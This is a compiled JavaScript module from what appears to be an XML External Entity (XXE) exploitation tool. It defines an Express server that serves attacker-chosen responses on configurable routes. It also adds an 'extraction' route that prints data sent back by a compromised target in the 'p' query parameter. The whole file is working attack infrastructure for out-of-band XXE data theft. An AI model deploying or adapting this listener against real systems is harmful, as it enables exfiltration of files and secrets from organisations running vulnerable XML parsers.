"use strict";
var __importDefault = (this && this.__importDefault) || function (mod) {
    return (mod && mod.__esModule) ? mod : { "default": mod };
};
Object.defineProperty(exports, "__esModule", { value: true });
exports.XXEServer = void 0;
var express_1 = __importDefault(require("express"));
var Handler_1 = require("./Handler");
var CliUtils_1 = require("./CliUtils");
var app = (0, express_1.default)();
var XXEServer = /** @class */ (function () {
    function XXEServer(address, port) {
        if (address === void 0) { address = "127.0.0.1"; }
        if (port === void 0) { port = 7777; }
        this.responses = {};
        this.address = address;
        this.port = port;
        this.started = false;
    }
    XXEServer.prototype.getServerUrl = function () {
        return "http://".concat(this.address, ":").concat(this.port);
    };
    XXEServer.prototype.addRoute = function (route, responseContent, printQueryString) {
        var _this = this;
        if (printQueryString === void 0) { printQueryString = false; }
        var fullPath = this.getServerUrl() + route;
        //if a route already defined just change the response :) 
        if (Object.keys(this.responses).includes(route)) {
            this.responses[route] = responseContent;
            return fullPath;
        }
        this.responses[route] = responseContent;
        if (Handler_1.Handler.VERBOSE)
            CliUtils_1.CliUtils.printInfo("Setting route " + route);
        app.get(route, function (request, response) {
            if (Handler_1.Handler.VERBOSE) {
                CliUtils_1.CliUtils.printInfo("[".concat(new Date().toISOString(), "] - Serving route ").concat(route, " to ip ").concat(request.ip));
            }
            if (printQueryString)
                CliUtils_1.CliUtils.printSuccess("Received extraction from ".concat(request.ip, ":\n") + request.query.p);
            response.send(_this.responses[route]);
        });
        return fullPath;
    };
    XXEServer.prototype.addExtractionRoute = function () {
        this.addRoute("/", "", true);
    };
    XXEServer.prototype.getServer = function () {
        return app;
    };
    XXEServer.prototype.start = function () {
        if (!this.started) {
            CliUtils_1.CliUtils.printInfo("Starting server at ".concat(this.getServerUrl()));
            this.server = app.listen(this.port, this.address);
            this.started = true;
        }
    };
    XXEServer.prototype.stop = function () {
        var _a;
        if (Handler_1.Handler.VERBOSE)
            CliUtils_1.CliUtils.printInfo("Stopping server");
        (_a = this.server) === null || _a === void 0 ? void 0 : _a.close();
        this.started = false;
    };
    return XXEServer;
}());
exports.XXEServer = XXEServer;
